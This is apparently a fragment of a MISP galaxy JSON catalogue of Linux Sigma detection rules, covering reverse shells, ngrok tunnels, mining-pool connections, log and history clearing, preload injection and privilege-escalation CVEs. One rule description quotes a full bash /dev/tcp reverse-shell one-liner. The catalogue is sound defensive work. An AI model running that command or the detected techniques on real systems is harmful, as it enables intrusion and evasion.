"https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml" ], "tags": [ "attack.exfiltration", "attack.command-and-control", "attack.t1567", "attack.t1568.002", "attack.t1572", "attack.t1090", "attack.t1102", "attack.s0508" ] }, "related": [ { "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "118f61a5-eb3e-4fb6-931f-2096647f4ecd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "19bf6fdb-7721-4f3d-867f-53467f6a5db6", "value": "Communication To Ngrok Tunneling Service - Linux" }, { "description": "Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-10-16", "falsepositive": [ "Unknown" ], "filename": "net_connection_lnx_back_connect_shell_dev.yml", "level": "critical", "logsource.category": "network_connection", "logsource.product": "linux", "refs": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml" ], "tags": [ "attack.execution", "attack.t1059.004" ] }, "related": [ { "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", "value": "Linux Reverse Shell Indicator" }, { "description": "Detects process connections to a Monero crypto mining pool", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-10-26", "falsepositive": [ "Legitimate use of crypto miners" ], "filename": "net_connection_lnx_crypto_mining_indicators.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "linux", "refs": [ "https://www.poolwatch.io/coin/monero", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml" ], "tags": [ "attack.impact", "attack.t1496" ] }, "related": [ { "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a46c93b7-55ed-4d27-a41b-c259456c4746", "value": "Linux Crypto Mining Pool Connections" }, { "description": "Detects programs that connect to known malware callback ports based on threat intelligence reports.\n", "meta": { "author": "hasselj", "creation_date": "2024-05-10", "falsepositive": [ "Unknown" ], "filename": "net_connection_lnx_susp_malware_callback_port.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "linux", "refs": [ "https://thehackernews.com/2024/01/systembc-malwares-c2-server-analysis.html", "https://www.mandiant.com/resources/blog/triton-actor-ttp-profile-custom-attack-tools-detections", "https://www.mandiant.com/resources/blog/ukraine-and-sandworm-team", "https://www.elastic.co/guide/en/security/current/potential-non-standard-port-ssh-connection.html", "https://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_susp_malware_callback_port.yml" ], "tags": [ "attack.persistence", "attack.command-and-control", "attack.t1571" ] }, "related": [ { "dest-uuid": "b18eae87-b469-4e14-b454-b171b416bc18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dbfc7c98-04ab-4ab7-aa94-c74d22aa7376", "value": "Potentially Suspicious Malware Callback Communication - Linux" }, { "description": "Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-04-02", "falsepositive": [ "Unknown" ], "filename": "lnx_shell_susp_rev_shells.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://alamot.github.io/reverse_shells/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_rev_shells.yml" ], "tags": [ "attack.execution", "attack.t1059.004" ] }, "related": [ { "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "738d9bcf-6999-4fdb-b4ac-3033037db8ab", "value": "Suspicious Reverse Shell Command Line" }, { "description": "Detects suspicious command with /dev/tcp", "meta": { "author": "frack113", "creation_date": "2021-12-10", "falsepositive": [ "Unknown" ], "filename": "lnx_susp_dev_tcp.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan", "https://book.hacktricks.xyz/shells/shells/linux", "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml" ], "tags": [ "attack.reconnaissance" ] }, "uuid": "6cc5fceb-9a71-4c23-aeeb-963abe0b279c", "value": "Suspicious Use of /dev/tcp" }, { "description": "Detects the presence of \"bpf_probe_write_user\" BPF helper-generated warning messages. Which could be a sign of suspicious eBPF activity on the system.", "meta": { "author": "Red Canary (idea), Nasreddine Bencherchali", "creation_date": "2023-01-25", "falsepositive": [ "Unknown" ], "filename": "lnx_potential_susp_ebpf_activity.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://redcanary.com/blog/ebpf-malware/", "https://man7.org/linux/man-pages/man7/bpf-helpers.7.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_potential_susp_ebpf_activity.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion" ] }, "uuid": "0fadd880-6af3-4610-b1e5-008dc3a11b8a", "value": "Potential Suspicious BPF Activity - Linux" }, { "description": "Detects suspicious command sequence that JexBoss", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-08-24", "falsepositive": [ "Unknown" ], "filename": "lnx_susp_jexboss.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://www.us-cert.gov/ncas/analysis-reports/AR18-312A", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_jexboss.yml" ], "tags": [ "attack.execution", "attack.t1059.004" ] }, "related": [ { "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae", "value": "JexBoss Command Sequence" }, { "description": "Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-04-05", "falsepositive": [ "Unknown" ], "filename": "lnx_symlink_etc_passwd.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://www.qualys.com/2021/05/04/21nails/21nails.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_symlink_etc_passwd.yml" ], "tags": [ "attack.t1204.001", "attack.execution" ] }, "related": [ { "dest-uuid": "ef67e13e-5598-4adc-bdb2-998225874fa9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523", "value": "Symlink Etc Passwd" }, { "description": "Detects buffer overflow attempts in Unix system log files", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-01", "falsepositive": [ "Unknown" ], "filename": "lnx_buffer_overflows.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_buffer_overflows.yml" ], "tags": [ "attack.t1068", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781", "value": "Buffer Overflow Attempts" }, { "description": "Detects suspicious shell commands used in various exploit codes (see references)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-08-21", "falsepositive": [ "Unknown" ], "filename": "lnx_shell_susp_commands.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "http://pastebin.com/FtygZ1cg", "https://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html", "https://artkond.com/2017/03/23/pivoting-guide/", "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml" ], "tags": [ "attack.execution", "attack.t1059.004" ] }, "related": [ { "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2aa1440c-9ae9-4d92-84a7-a9e5f5e31695", "value": "Suspicious Activity in Shell Commands" }, { "description": "Detects suspicious log entries in Linux log files", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-25", "falsepositive": [ "Unknown" ], "filename": "lnx_shell_susp_log_entries.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/ossec/ossec-hids/blob/master/etc/rules/syslog_rules.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_log_entries.yml" ], "tags": [ "attack.impact" ] }, "uuid": "f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1", "value": "Suspicious Log Entries" }, { "description": "Detects the addition of a new user to a privileged group such as \"root\" or \"sudo\"", "meta": { "author": "Pawel Mazur", "creation_date": "2022-12-21", "falsepositive": [ "Administrative activity" ], "filename": "lnx_privileged_user_creation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid", "https://digital.nhs.uk/cyber-alerts/2018/cc-2825", "https://linux.die.net/man/8/useradd", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_privileged_user_creation.yml" ], "tags": [ "attack.persistence", "attack.t1136.001", "attack.t1098" ] }, "related": [ { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0ac15ec3-d24f-4246-aa2a-3077bb1cf90e", "value": "Privileged User Has Been Created" }, { "description": "Detects the ld.so preload persistence file. See `man ld.so` for more information.", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-05-05", "falsepositive": [ "Rare temporary workaround for library misconfiguration" ], "filename": "lnx_ldso_preload_injection.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://man7.org/linux/man-pages/man8/ld.so.8.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_ldso_preload_injection.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1574.006" ] }, "related": [ { "dest-uuid": "633a100c-b2c9-41bf-9be5-905c1b16c825", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7e3c4651-c347-40c4-b1d4-d48590fdf684", "value": "Code Injection by ld.so Preload" }, { "description": "Detects specific commands commonly used to remove or empty the syslog", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2021-09-10", "falsepositive": [ "Log rotation" ], "filename": "lnx_clear_syslog.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_clear_syslog.yml" ], "tags": [ "attack.impact", "attack.t1565.001" ] }, "related": [ { "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e09eb557-96d2-4de9-ba2d-30f712a5afd3", "value": "Commands to Clear or Remove the Syslog - Builtin" }, { "description": "Detects shellshock expressions in log files", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-14", "falsepositive": [ "Unknown" ], "filename": "lnx_shellshock.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shellshock.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c67e0c98-4d39-46ee-8f6b-437ebf6b950e", "value": "Shellshock Expression" }, { "description": "Detects the use of tools that copy files from or to remote systems", "meta": { "author": "Ömer Günal", "creation_date": "2020-06-18", "falsepositive": [ "Legitimate administration activities" ], "filename": "lnx_file_copy.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://attack.mitre.org/techniques/T1105/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_file_copy.yml" ], "tags": [ "attack.command-and-control", "attack.lateral-movement", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7a14080d-a048-4de8-ae58-604ce58a795b", "value": "Remote File Copy" }, { "description": "Detects commands that try to clear or tamper with the Linux command history.\nThis technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as \"bash_history\" or \"zsh_history\".\n", "meta": { "author": "Patrick Bareiss", "creation_date": "2019-03-24", "falsepositive": [ "Unknown" ], "filename": "lnx_shell_clear_cmd_history.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md", "https://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.003" ] }, "related": [ { "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fdc88d25-96fb-4b7c-9633-c0e417fdbd4e", "value": "Linux Command History Tampering" }, { "description": "Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)", "meta": { "author": "Bhabesh Raj", "creation_date": "2022-05-04", "falsepositive": [ "Unknown" ], "filename": "lnx_nimbuspwn_privilege_escalation_exploit.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/Immersive-Labs-Sec/nimbuspwn", "https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1068" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8", "value": "Nimbuspwn Exploitation" }, { "description": "Detects space after filename", "meta": { "author": "Ömer Günal", "creation_date": "2020-06-17", "falsepositive": [ "Typos" ], "filename": "lnx_space_after_filename_.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://attack.mitre.org/techniques/T1064", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_space_after_filename_.yml" ], "tags": [ "attack.execution" ] }, "uuid": "879c3015-c88b-4782-93d7-07adf92dbcb7", "value": "Space After Filename" }, { "description": "Detects suspicious shell commands used in various Equation Group scripts and tools", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-04-09", "falsepositive": [ "Unknown" ], "filename": "lnx_apt_equationgroup_lnx.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml" ], "tags": [ "attack.execution", "attack.g0020", "attack.t1059.004" ] }, "related": [ { "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "41e5c73d-9983-4b69-bd03-e13b67e9623c", "value": "Equation Group Indicators" }, { "description": "Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-07-05", "falsepositive": [ "Unknown" ], "filename": "lnx_vsftpd_susp_error_messages.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/dagwieers/vsftpd/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "377f33a1-4b36-4ee1-acee-1dbe4b43cfbe", "value": "Suspicious VSFTPD Error Messages" }, { "description": "Detects potential PwnKit exploitation CVE-2021-4034 in auth logs", "meta": { "author": "Sreeman", "creation_date": "2022-01-26", "falsepositive": [ "Unknown" ], "filename": "lnx_auth_pwnkit_local_privilege_escalation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://twitter.com/wdormann/status/1486161836961579020", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/auth/lnx_auth_pwnkit_local_privilege_escalation.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548.001" ] }, "related": [ { "dest-uuid": "6831414d-bb70-42b7-8030-d4e06b2660c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0506a799-698b-43b4-85a1-ac4c84c720e9", "value": "PwnKit Local Privilege Escalation" }, { "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-10-15", "falsepositive": [ "Unlikely" ], "filename": "lnx_sudo_cve_2019_14287_user.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://www.openwall.com/lists/oss-security/2019/10/14/1", "https://twitter.com/matthieugarin/status/1183970598210412546", "https://access.redhat.com/security/cve/cve-2019-14287", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1068", "attack.t1548.003", "cve.2019-14287" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1365fe3b-0f50-455d-b4da-266ce31c23b0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7fcc54cb-f27d-4684-84b7-436af096f858", "value": "Sudo Privilege Escalation CVE-2019-14287 - Builtin" }, { "description": "Detects relevant ClamAV messages", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-01", "falsepositive": [ "Unknown" ], "filename": "lnx_clamav_relevant_message.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml" ], "tags": [ "attack.resource-development", "attack.t1588.001" ] }, "related": [ { "dest-uuid": "7807d3a4-a885-4639-a786-c1ed41484970", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb", "value": "Relevant ClamAV Message" }, { "description": "Detects disabling security tools", "meta": { "author": "Ömer Günal, Alejandro Ortuno, oscd.community", "creation_date": "2020-06-17", "falsepositive": [ "Legitimate administration activities" ], "filename": "lnx_syslog_security_tools_disabling_syslog.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36", "value": "Disabling Security Tools - Builtin" }, { "description": "Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-02-20", "falsepositive": [ "Unknown" ], "filename": "lnx_syslog_susp_named.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c8e35e96-19ce-4f16-aeb6-fd5588dc5365", "value": "Suspicious Named Error" }, { "description": "Detects exploitation attempt using public exploit code for CVE-2018-15473", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-08-24", "falsepositive": [ "Unknown" ], "filename": "lnx_sshd_ssh_cve_2018_15473.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/Rhynorater/CVE-2018-15473-Exploit", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml" ], "tags": [ "attack.reconnaissance", "attack.t1589" ] }, "related": [ { "dest-uuid": "5282dd9a-d26d-4e16-88b7-7c0f4553daf4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4c9d903d-4939-4094-ade0-3cb748f4d7da", "value": "SSHD Error Message CVE-2018-15473" }, { "description": "Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-06-30", "falsepositive": [ "Unknown" ], "filename": "lnx_sshd_susp_ssh.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c", "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e76b413a-83d0-4b94-8e4c-85db4a5b8bdc", "value": "Suspicious OpenSSH Daemon Error" }, { "description": "Detects suspicious session with two users present", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-07-03", "falsepositive": [ "Unknown" ], "filename": "lnx_guacamole_susp_guacamole.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://research.checkpoint.com/2020/apache-guacamole-rce/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml" ], "tags": [ "attack.credential-access", "attack.t1212" ] }, "related": [ { "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1edd77db-0669-4fef-9598-165bda82826d", "value": "Guacamole Two Users Sharing Session Anomaly" }, { "description": "Detects suspicious modification of crontab file.", "meta": { "author": "Pawel Mazur", "creation_date": "2022-04-16", "falsepositive": [ "Legitimate modification of crontab" ], "filename": "lnx_cron_crontab_file_modification.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/cron/lnx_cron_crontab_file_modification.yml" ], "tags": [ "attack.persistence", "attack.t1053.003" ] }, "related": [ { "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "af202fd3-7bff-4212-a25a-fb34606cfcbe", "value": "Modifying Crontab" } ], "version": 20241104 }